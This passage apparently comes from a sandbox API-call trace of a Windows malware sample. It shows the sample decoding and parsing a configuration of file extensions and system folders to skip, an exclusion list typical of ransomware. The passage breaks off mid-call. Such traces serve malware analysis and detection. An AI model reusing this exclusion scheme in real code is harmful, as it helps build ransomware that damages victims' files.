lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0112.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x13ac65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 
[0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, 
lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", 
cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.831] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0112.832] CompareStringW (Locale=0x400, 
